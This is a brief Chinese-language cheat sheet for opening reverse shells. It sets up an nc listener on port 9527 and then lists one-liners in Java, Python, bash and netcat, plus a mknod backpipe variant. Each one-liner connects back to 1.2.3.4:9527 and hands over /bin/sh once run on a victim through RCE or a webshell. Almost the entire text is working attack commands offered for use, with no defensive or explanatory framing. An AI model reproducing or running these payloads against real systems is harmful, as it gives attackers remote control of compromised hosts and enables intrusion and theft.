攻击主机先监听端口
最简单的脚本可以用 nc :
nc -lvvp 9527被攻击主机连接到服务端口
一般都需要通过 RCE、 webshell 等方式在被攻击机执行以下命令,具体怎么做就要看水平了:
JAVA
Runtime.getRuntime().exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.2.3.4/9527;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",9527));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'bash
bash -i >& /dev/tcp/1.2.3.4/9527 0>&1nc
nc -e /bin/sh 1.2.3.4 9527或
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 1.2.3.4 9527 1>/tmp/backpipe
